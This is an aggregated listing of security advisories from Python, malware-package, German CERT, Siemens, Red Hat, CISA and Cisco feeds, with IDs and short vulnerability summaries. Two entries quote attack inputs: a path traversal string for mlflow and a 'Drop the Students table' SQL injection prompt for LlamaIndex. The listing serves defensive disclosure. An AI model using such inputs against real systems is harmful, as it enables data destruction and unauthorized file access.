pysec-2023-254	cryptography is a package designed to expose cryptographic primitives and recipes to Python developers. Calling `load_pem_pkcs7_certificates` or `load_der_pkcs7_certificates` could lead to a NULL-pointer dereference and segfault. Exploitation of this vulnerability poses a serious risk of Denial of Service (DoS) for any application attempting to deserialize a PKCS7 blob/certificate. The consequences extend to potential disruptions in system availability and stability. This vulnerability has been patched in version 41.0.6.
pysec-2024-38	FastAPI is a web framework for building APIs with Python 3.8+ based on standard Python type hints. When using form data, `python-multipart` uses a Regular Expression to parse the HTTP `Content-Type` header, including options. An attacker could send a custom-made `Content-Type` option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can't handle any more requests. It's a ReDoS(Regular expression Denial of Service), it only applies to those reading form data, using `python-multipart`. This vulnerability has been patched in version 0.109.1.
pysec-2024-37	nonebot2 is a cross-platform Python asynchronous chatbot framework written in Python. This security advisory pertains to a potential information leak (e.g., environment variables) in instances where developers utilize `MessageTemplate` and incorporate user-provided data into templates. The identified vulnerability has been remedied in pull request #2509 and will be included in versions released from 2.2.0. Users are strongly advised to upgrade to these patched versions to safeguard against the vulnerability. A temporary workaround involves filtering underscores before incorporating user input into the message template.
pysec-2022-43059	AIOHTTP 3.8.1 can report a "ValueError: Invalid IPv6 URL" outcome, which can lead to a Denial of Service (DoS). NOTE: multiple third parties dispute this issue because there is no example of a context in which denial of service would occur, and many common contexts have exception handing in the calling application
pysec-2024-36	An information disclosure flaw was found in ansible-core due to a failure to respect the ANSIBLE_NO_LOG configuration in some scenarios. It was discovered that information is still included in the output in certain tasks, such as loop items. Depending on the task, this issue may include sensitive information, such as decrypted secret values.
pysec-2023-253	Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.
pysec-2024-35	Versions of the package dash-core-components before 2.13.0; all versions of the package dash-core-components; versions of the package dash before 2.15.0; all versions of the package dash-html-components; versions of the package dash-html-components before 2.0.16 are vulnerable to Cross-site Scripting (XSS) when the href of the a tag is controlled by an adversary. An authenticated attacker who stores a view that exploits this vulnerability could steal the data that's visible to another user who opens that view - not just the data already included on the page, but they could also, in theory, make additional requests and access other data accessible to this user. In some cases, they could also steal the access tokens of that user, which would allow the attacker to act as that user, including viewing other apps and resources hosted on the same server. Note: This is only exploitable in Dash apps that include some mechanism to store user input to be reloaded by a different user.
pysec-2024-12	LlamaIndex (aka llama_index) through 0.9.34 allows SQL injection via the Text-to-SQL feature in NLSQLTableQueryEngine, SQLTableRetrieverQueryEngine, NLSQLRetriever, RetrieverQueryEngine, and PGVectorSQLQueryEngine. For example, an attacker might be able to delete this year's student records via "Drop the Students table" within English language input.
pysec-2024-34	The vantage6 technology enables to manage and deploy privacy enhancing technologies like Federated Learning (FL) and Multi-Party Computation (MPC). Nodes and servers get a ssh config by default that permits root login with password authentication. In a proper deployment, the SSH service is not exposed so there is no risk, but not all deployments are ideal. The default should therefore be less permissive. The vulnerability can be mitigated by removing the ssh part from the docker file and rebuilding the docker image. Version 4.2.0 patches the vulnerability.
pysec-2024-33	The vantage6 technology enables to manage and deploy privacy enhancing technologies like Federated Learning (FL) and Multi-Party Computation (MPC). Nodes and servers get a ssh config by default that permits root login with password authentication. In a proper deployment, the SSH service is not exposed so there is no risk, but not all deployments are ideal. The default should therefore be less permissive. The vulnerability can be mitigated by removing the ssh part from the docker file and rebuilding the docker image. Version 4.2.0 patches the vulnerability.
pysec-2024-32	The vantage6 technology enables to manage and deploy privacy enhancing technologies like Federated Learning (FL) and Multi-Party Computation (MPC). There are no checks on whether the input is encrypted if a task is created in an encrypted collaboration. Therefore, a user may accidentally create a task with sensitive input data that will then be stored unencrypted in a database. Users should ensure they set the encryption setting correctly. This vulnerability is patched in 4.2.0.
pysec-2024-31	The vantage6 technology enables to manage and deploy privacy enhancing technologies like Federated Learning (FL) and Multi-Party Computation (MPC). It is possible to find out usernames from the response time of login requests. This could aid attackers in credential attacks. Version 4.2.0 patches this vulnerability.
pysec-2024-30	The vantage6 technology enables to manage and deploy privacy enhancing technologies like Federated Learning (FL) and Multi-Party Computation (MPC). Prior to 4.2.0, authenticated users could inject code into algorithm environment variables, resulting in remote code execution. This vulnerability is patched in 4.2.0.
pysec-2024-29	OctoPrint is a web interface for 3D printer.s OctoPrint versions up until and including 1.9.3 contain a vulnerability that allows malicious admins to change the password of other admin accounts, including their own, without having to repeat their password. An attacker who managed to hijack an admin account might use this to lock out actual admins from their OctoPrint instance. The vulnerability will be patched in version 1.10.0.
pysec-2024-28	An issue was discovered in Django 3.2 before 3.2.24, 4.2 before 4.2.10, and Django 5.0 before 5.0.2. The intcomma template filter was subject to a potential denial-of-service attack when used with very long strings.
pysec-2023-252	Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.

Vulnerabilities are sorted by update time (recent to old).
ID	Description
gsd-2024-33881	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33880	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33879	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33878	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33877	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33876	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33875	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33874	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33873	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33872	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33871	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33870	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33869	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33868	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33867	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33866	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33865	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33864	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33863	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33862	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33861	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33860	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33859	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33858	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33857	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33856	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33855	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33854	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33853	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33852	The format of the source doesn't require a description, click on the link for more details

Vulnerabilities are sorted by update time (recent to old).
ID	Description
mal-2024-1264	--- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (a6a881b5f34acb08b303ac7f027ae585053ffab51b72cfa79a2bb4b4cbdf3f55) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
mal-2024-1261	--- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (b9bf43d6e49697b8f9e4d87c7cc739e1b31a2db5132fabce880c79cb4d1fd860) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
mal-2024-1260	--- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (d2b1894dd696dfb0e732a29e63d51abc46571ac2e0b0528d22359a070066b65d) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
mal-2024-1265	--- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (55cac2c796a655b4203b015952598ff85be425c2e7b0d0fd4ca5f15da45cb322) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
mal-2024-1263	--- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (5e7792da9bcfb9756c78247a525424f0782b412e24f2479452b818867cc71096) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
mal-2024-1262	--- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (6902c9afc31fa0c3a2b8cc9970a33d7a27356e2171646b06e01e383655efea51) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
mal-2024-1259	--- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (949e41fb87570733314ef5f1c461cb8f7d60ec996c7e12a4df38a36cc03d7b86) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
mal-2024-1258	--- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (28bcce7dcd6942284e70d474af5e6e6343689f9cba20393e07d9bbabf4af5076) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
mal-2024-1256	--- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (a2024bbd933a9c01975b023ff2dd84531dde77e3956d38d5b582374451fa995d) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
mal-2024-1255	--- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (c51728830d7aed5b2134c0a91306e13560b271e8508376b3364616e35473898e) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
mal-2024-1257	--- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (d15650dd9d3ef6040ce65c2e6b3207c96240af179ecbc7061ed5064205df4673) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
mal-2024-1266	--- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (da59ce3066bc4f743fd62c3c5db000f13a21c5167bf5987991697d4b631b6288) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
mal-2024-1254	--- _-= Per source details. Do not edit below this line.=-_ ## Source: ossf-package-analysis (9d1ba9bc54763d8ec8336f0edc8d5997d5fb080801556f288a4935dac06d4878) The OpenSSF Package Analysis project identified 'reqargs' @ 1.4 (pypi) as malicious. It is considered malicious because: - The package communicates with a domain associated with malicious activity.
mal-2024-1206	--- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (7c45841bc7c5a73373ee4764c017a128bb5dd286d34d5d4a2bf649338aa1644a) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. ## Source: ossf-package-analysis (0e4a766d68b4520042016fc0d4d008f37111c842bf3c667daff21680990d840a) The OpenSSF Package Analysis project identified 'f3ngtest12345677' @ 1.0.1 (npm) as malicious. It is considered malicious because: - The package executes one or more commands associated with malicious behavior.
mal-2024-1203	--- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (7ecb1d1aad101d1cf5bdd8986e77fa20c75f039412cec1ebe03442f8fec9f939) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. ## Source: ossf-package-analysis (2296335be4a9421627ac02498a5a93323e7687011a2d6e7996e2926065339339) The OpenSSF Package Analysis project identified 'nespresso-bi' @ 199.999.0 (npm) as malicious. It is considered malicious because: - The package communicates with a domain associated with malicious activity. - The package executes one or more commands associated with malicious behavior.
mal-2022-7444	--- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (514b0f3bf7aaec1696a74c2c75dbfa0bef1ec45f4f932d67378d25c0c281286d) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
mal-2022-7443	--- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (8bd1bc746628f776e2d199962f3ab978ada0ab996b43c262e1b04aaa0343d7f1) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
mal-2024-1243	--- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (7bd870e9a4b756cffdd1e5cfba86cd8edb34d34c9ca9467057155fc0e9b0d750) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
mal-2024-1240	--- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (a472ad3dc99c2febc88648cf3ccbf6f17c2a254e86c2ffa2e8ed945d25665816) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
mal-2024-1230	--- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (aae1452d962828880783e96a646a0aa0412ecbd05092f5b877b2e531626318be) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
mal-2024-1227	--- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (0283930fe8d814ee74e54a0c5c9840cfb9db19835aeb82c67a360d39407e4132) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
mal-2024-1216	--- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (9f2f1e7f12097a4d36cf205e64bac66845c1b50b491e55e305944d68de0aa299) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
mal-2024-1213	--- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (d95228871b0d604b7e64f4bb155e928331863408ffab79af790ee8353994622b) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
mal-2024-1245	--- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (a7c57b35b6e315e64ebaa3a40ff4cce5807793bf704f35f28a1a299a766d2971) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
mal-2024-1242	--- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (bc4d86a2ccf9f0cabe4c1fad7282ed774c851e0c735abfecc81bdb5779f32f21) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
mal-2024-1239	--- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (c80f02945652dedbbc63973a876fbc73f9aae08b5c6760a072e8e9a994954cf9) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
mal-2024-1233	--- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (48fa3414b1fc4238faa198d07d0f7a8e656a706a83fae508bac516436f6860fc) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
mal-2024-1232	--- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (ac8ddda17313c540b777f7757d4d61d097a7eb003234cc5c4096ee03e5bd7b73) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
mal-2024-1225	--- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (2278ac46e2dcc463150100fdf3e8757f162ae7088ed44798085eb277c8111a6c) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
mal-2024-1224	--- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (4a580421233df7644c976ffb287a35a86664f2926eb6790147cf917fe5ce6065) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

Vulnerabilities are sorted by update time (recent to old).
ID	Description
wid-sec-w-2024-0776	Node.js: Mehrere Schwachstellen
wid-sec-w-2024-0773	Linux Kernel: Mehrere Schwachstellen
wid-sec-w-2024-0749	Linux Kernel: Mehrere Schwachstellen
wid-sec-w-2024-0681	Red Hat Enterprise Linux: Golang-Komponenten-Schwachstelle ermöglicht Denial of Service
wid-sec-w-2024-0534	Linux Kernel: Mehrere Schwachstellen
wid-sec-w-2024-0475	Linux-Kernel: Mehrere Schwachstellen ermöglichen Denial of Service und unspezifische Angriffe
wid-sec-w-2024-0473	Linux Kernel: Mehrere Schwachstellen
wid-sec-w-2024-0444	Linux Kernel: Mehrere Schwachstellen
wid-sec-w-2024-0393	Node.js: Mehrere Schwachstellen
wid-sec-w-2024-0346	Linux Kernel: Schwachstelle ermöglicht Denial of Service
wid-sec-w-2024-0126	EDK2 NetworkPkg IP stack implementation: Mehrere Schwachstellen
wid-sec-w-2024-0050	Insyde UEFI Firmware: Mehrere Schwachstellen ermöglichen Codeausführung
wid-sec-w-2023-3174	SSH Protokoll: Schwachstelle ermöglicht Umgehen von Sicherheitsvorkehrungen
wid-sec-w-2023-1254	Linux Kernel (vmwgfx): Mehrere Schwachstellen
wid-sec-w-2023-0583	Apache HTTP Server: Mehrere Schwachstellen ermöglichen HTTP Response Splitting
wid-sec-w-2022-2058	Grub2: Mehrere Schwachstellen
wid-sec-w-2022-1664	Linux Kernel: Mehrere Schwachstellen ermöglichen Denial of Service
wid-sec-w-2022-1374	Linux Kernel: Mehrere Schwachstellen
wid-sec-w-2024-1703	docker: Schwachstelle ermöglicht Privilegieneskalation
wid-sec-w-2024-1702	IBM InfoSphere Information Server: Schwachstelle ermöglicht Offenlegung von Informationen
wid-sec-w-2024-1701	Aruba EdgeConnect: Mehrere Schwachstellen
wid-sec-w-2024-1700	Internet Systems Consortium BIND: Mehrere Schwachstellen ermöglichen Denial of Service
wid-sec-w-2024-1699	Dell Edge Gateway BIOS: Mehrere Schwachstellen
wid-sec-w-2024-1698	Aruba EdgeConnect: Mehrere Schwachstellen
wid-sec-w-2024-1697	cURL: Mehrere Schwachstellen ermöglichen Denial of Service und Offenlegung von Informationen
wid-sec-w-2024-1696	SolarWinds Platform: Mehrere Schwachstellen
wid-sec-w-2024-1695	Arista EOS: Mehrere Schwachstellen ermöglichen Umgehen von Sicherheitsvorkehrungen
wid-sec-w-2024-1694	Google Chrome: Mehrere Schwachstellen
wid-sec-w-2024-1693	Octopus Deploy: Mehrere Schwachstellen ermöglichen Offenlegung von Informationen
wid-sec-w-2024-1692	Red Hat Enterprise Linux: Mehrere Schwachstellen ermöglichen nicht spezifizierten Angriff

Vulnerabilities are sorted by update time (recent to old).
ID	Description
ssa-962515	SSA-962515: Out of Bounds Read Vulnerability in Industrial Products
ssa-953710	SSA-953710: Vulnerabilities in the Network Communication Stack in Desigo Fire Safety UL and Cerberus PRO UL Fire Protection Systems
ssa-935500	SSA-935500: Denial of Service Vulnerability in FTP Server of Nucleus RTOS based APOGEE, TALON and Desigo PXC/PXM Products
ssa-925850	SSA-925850: Improper Access Control in Polarion ALM
ssa-923361	SSA-923361: MODEL File Parsing Vulnerability in Tecnomatix Plant Simulation before V2302.0011
ssa-916916	SSA-916916: Security Vulnerabilities Fixed in RUGGEDCOM CROSSBOW V5.5
ssa-871717	SSA-871717: Multiple Vulnerabilities in Polarion ALM
ssa-712929	SSA-712929: Denial of Service Vulnerability in OpenSSL (CVE-2022-0778) Affecting Industrial Products
ssa-691715	SSA-691715: Vulnerability in OPC Foundation Local Discovery Server Affecting Siemens Products
ssa-665034	SSA-665034: Vulnerability in Nozomi Guardian/CMC before 23.3.0 on RUGGEDCOM APE1808 devices
ssa-661579	SSA-661579: Multiple File Parsing Vulnerabilities in Teamcenter Visualization and JT2Go
ssa-647455	SSA-647455: Multiple Vulnerabilities in Nozomi Guardian/CMC before 22.6.2 on RUGGEDCOM APE1808 devices
ssa-593272	SSA-593272: SegmentSmack in Interniche IP-Stack based Industrial Devices
ssa-592380	SSA-592380: Denial of Service Vulnerability in SIMATIC S7-1500 CPUs and related products
ssa-589937	SSA-589937: Multiple Memory Corruption Vulnerabilities in Solid Edge
ssa-552874	SSA-552874: Denial of Service Vulnerability in SIPROTEC 5 Devices
ssa-489698	SSA-489698: X_T File Parsing Vulnerability in Parasolid
ssa-455250	SSA-455250: Multiple Vulnerabilities in Palo Alto Networks Virtual NGFW on RUGGEDCOM APE1808 devices
ssa-382651	SSA-382651: File Parsing Vulnerability in Solid Edge
ssa-322980	SSA-322980: Denial of Service Vulnerability in SIPROTEC 5 Devices
ssa-292063	SSA-292063: Multiple Vulnerabilities in Nozomi Guardian/CMC before 22.6.3 and 23.1.0 on RUGGEDCOM APE1808 devices
ssa-292022	SSA-292022: Vulnerability in Nozomi Guardian/CMC before 23.4.1 on RUGGEDCOM APE1808 devices
ssa-273900	SSA-273900: Multiple Vulnerabilities in SIMATIC CN 4100 before V3.0
ssa-265688	SSA-265688: Vulnerabilities in the additional GNU/Linux subsystem of the SIMATIC S7-1500 TM MFP V1.1
ssa-258494	SSA-258494: Stack Overflow Vulnerability in Simcenter Nastran before 2406.90
ssa-240541	SSA-240541: WIBU Systems CodeMeter Heap Buffer Overflow Vulnerability in Industrial Products
ssa-225840	SSA-225840: Vulnerabilities in the Network Communication Stack in Sinteso EN and Cerberus PRO EN Fire Protection Systems
ssa-148641	SSA-148641: XPath Constraint Vulnerability in Mendix Runtime
ssa-046364	SSA-046364: X_T File Parsing Vulnerabilities in Parasolid
ssa-750274	SSA-750274: Impact of CVE-2024-3400 on RUGGEDCOM APE1808 devices configured with Palo Alto Networks Virtual NGFW

Vulnerabilities are sorted by update time (recent to old).
ID	Description
rhsa-2024_0198	Red Hat Security Advisory: OpenShift Container Platform 4.12.47 security update
rhsa-2024_0660	Red Hat Security Advisory: OpenShift Container Platform 4.13.32 bug fix and security update
rhsa-2024_0193	Red Hat Security Advisory: OpenShift Container Platform 4.13.29 bug fix and security update
rhsa-2024_0273	Red Hat Security Advisory: OpenShift Virtualization 4.12.9 Images security and bug fix update
rhsa-2024_0484	Red Hat Security Advisory: OpenShift Container Platform 4.13.31 bug fix and security update
rhsa-2024_0059	Red Hat Security Advisory: OpenShift Container Platform 4.11.56 bug fix and security update
rhsa-2024_0485	Red Hat Security Advisory: OpenShift Container Platform 4.12.48 bug fix and security update
rhsa-2024_0050	Red Hat Security Advisory: OpenShift Container Platform 4.14.8 bug fix and security update
rhsa-2024_0306	Red Hat Security Advisory: OpenShift Container Platform 4.11.57 bug fix and security update
rhsa-2023_7827	Red Hat Security Advisory: OpenShift Container Platform 4.13.z security update
rhsa-2023_7831	Red Hat Security Advisory: OpenShift Container Platform 4.14.7 bug fix and security update
rhsa-2023_7823	Red Hat Security Advisory: OpenShift Container Platform 4.12.46 bug fix and security update
rhsa-2023_7691	Red Hat Security Advisory: OpenShift Container Platform 4.11.55 bug fix and security update
rhsa-2023_7608	Red Hat Security Advisory: OpenShift Container Platform 4.12.45 bug fix and security update
rhsa-2023_7690	Red Hat Security Advisory: OpenShift Container Platform 4.11.55 security update
rhsa-2023_7607	Red Hat Security Advisory: OpenShift Container Platform 4.12.45 security and extras update
rhsa-2023_7687	Red Hat Security Advisory: OpenShift Container Platform 4.13.26 bug fix and security update
rhsa-2023_7604	Red Hat Security Advisory: OpenShift Container Platform 4.13.25 bug fix and security update
rhsa-2023_7682	Red Hat Security Advisory: OpenShift Container Platform 4.14.6 bug fix and security update
rhsa-2023_7602	Red Hat Security Advisory: OpenShift Container Platform 4.13.25 security and extras update
rhsa-2023_7741	Red Hat Security Advisory: Red Hat Ceph Storage 6.1 security, enhancements, and bug fix update
rhsa-2023_7662	Red Hat Security Advisory: Red Hat OpenShift for Windows Containers 6.0.3 security update
rhsa-2023_7710	Red Hat Security Advisory: Red Hat OpenShift for Windows Containers 7.2.0 security update
rhsa-2023_7599	Red Hat Security Advisory: OpenShift Container Platform 4.14.5 bug fix and security update
rhsa-2023_7704	Red Hat Security Advisory: OpenShift Virtualization 4.14.1 security and bug fix update
rhsa-2023_7555	Red Hat Security Advisory: OpenShift API for Data Protection (OADP) 1.3.0 security update
rhsa-2023_7703	Red Hat Security Advisory: Red Hat OpenShift Pipelines 1.10.6 release and security update
rhsa-2023_7522	Red Hat Security Advisory: OpenShift Virtualization 4.13.6 security and bug fix update
rhsa-2023_7699	Red Hat Security Advisory: Red Hat OpenShift Pipelines Client tkn for 1.10.6 release and security update
rhsa-2023_7521	Red Hat Security Advisory: OpenShift Virtualization 4.13.6 RPMs security and bug fix update

Vulnerabilities are sorted by update time (recent to old).
ID	Description
icsa-24-165-01	Siemens Mendix Applications
icsa-24-158-04	Johnson Controls Software House iStar Pro Door Controller
icsa-24-158-03	Mitsubishi Electric CC-Link IE TSN Industrial Managed Switch
icsa-24-158-02	Emerson Ovation
icsa-24-158-01	Emerson PACSystem and Fanuc
icsa-24-156-01	Uniview NVR301-04S2-P4
icsa-24-151-02	Fuji Electric Monitouch V-SFT (Update A)
icsa-23-278-03	Mitsubishi Electric CC-Link IE TSN Industrial Managed Switch (Update A)
icsma-24-151-02	Baxter Welch Allyn Connex Spot Monitor
icsma-24-151-01	Baxter Welch Allyn Configuration Tool
icsa-24-151-04	Westermo EDW-100
icsa-24-151-03	Inosoft VisiWin
icsa-24-151-01	LenelS2 NetBox
icsa-22-356-03	Mitsubishi Electric MELSEC iQ-R, iQ-L Series and MELIPC Series (Update C)
icsa-22-172-01	Mitsubishi Electric MELSEC iQ-R, Q, L Series and MELIPC Series (Update C)
icsa-24-149-01	Campbell Scientific CSI Web Server
icsa-24-144-01	AutomationDirect Productivity PLCs
icsa-24-142-01	LCDS LAquis SCADA
icsma-20-049-02	GE Healthcare Ultrasound products (Update A)
icsa-24-137-14	Rockwell Automation FactoryTalk View SE
icsa-24-044-01	Mitsubishi Electric MELSEC iQ-R Series Safety CPU and SIL2 Process CPU (Update A)
icsa-24-135-04	Mitsubishi Electric Multiple FA Engineering Software Products
icsa-24-135-03	Johnson Controls Software House C-CURE 9000
icsa-24-135-02	SUBNET PowerSYSTEM Center
icsa-24-135-01	Rockwell Automation FactoryTalk Remote Access
icsa-24-137-13	Siemens Industrial Products
icsa-24-137-12	Siemens Desigo Fire Safety UL and Cerberus PRO UL Fire Protection Systems
icsa-24-137-11	Siemens RUGGEDCOM APE1808
icsa-24-137-10	Siemens RUGGEDCOM CROSSBOW
icsa-24-137-09	Siemens Solid Edge

Vulnerabilities are sorted by update time (recent to old).
ID	Description
cisco-sa-esa-afw-bgg2usjh	Cisco Secure Email Gateway Arbitrary File Write Vulnerability
cisco-sa-cssm-auth-slw3uhuy	Cisco Smart Software Manager On-Prem Password Change Vulnerability
cisco-sa-xr-secure-boot-qud5g8ap	Cisco IOS XR Software Secure Boot Bypass Vulnerability
cisco-sa-nxos-cmd-injection-xd9ohyop	Cisco NX-OS Software CLI Command Injection Vulnerability
cisco-sa-cimc-cmd-inj-blupcb	Cisco Integrated Management Controller Web-Based Management Interface Command Injection Vulnerability
